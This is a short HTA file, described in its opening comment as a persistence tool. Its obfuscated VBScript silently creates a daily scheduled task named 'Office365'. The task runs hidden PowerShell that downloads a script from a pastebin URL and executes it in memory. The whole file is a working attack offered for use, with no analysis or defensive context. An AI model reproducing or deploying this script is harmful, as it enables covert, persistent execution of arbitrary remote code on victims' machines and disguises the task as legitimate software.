#This .hta scripts can be used, to create a taskschedule persistence with a not proxy aware PowerShell Download Cradle

<HTML> 
<HEAD> 
<script language="VBScript">
	Set WshShell = CreateObject("W"+"S"+"cr"+"ip"+"t."+"Sh"+"e"+"l"+"l")
		Connect="cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR ""pOwErsHelL -w hidDEn -nOpR  -coM 'I`eX (N`E`W`-obje`CT Net.Webclient).\\\""dowNloa`DST`RIng\\\""((\\\""https://pastebin.com/raw/Qpiz8y6c\\\""))"""
	WshShell.Run Connect, 0, true
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</HEAD> 
<BODY> 
</BODY> 
</HTML>
